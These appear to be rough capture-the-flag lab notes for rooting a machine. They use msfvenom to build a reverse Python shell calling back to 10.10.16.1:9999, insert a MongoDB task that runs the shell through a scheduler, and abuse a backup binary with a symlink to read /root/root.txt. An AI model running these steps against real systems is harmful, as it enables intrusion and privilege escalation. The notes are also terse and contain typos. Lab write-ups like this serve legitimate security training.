try:

mongo -u username -p PASS authSource(i.e scheduler)

note db.collection('NAME') for database name.

 msfvenom -p cmd/unix/reverse_python lhost=10.10.16.1 lport=9999 R 

upload the shell to the victim.

then do: on victim

db.tasks.insert({ "cmd": "/bin/bash /tmp/shell.sh;" } );

WriteResult({ "nInserted" : 1 })

Back up key found?

copy the key and use it with:

./backup -q hashes /tmp

this will create base64 file.

decide it and see what kind of file it is.

---

Link root.txt to a tmp file;

mkdir /tmp/gori

ln -s /root/root.txt /tmp/gori

/usr/local/bin/backup -q pass /tmp/gori > xxx
cat xxx | base64 --decode > xxx-d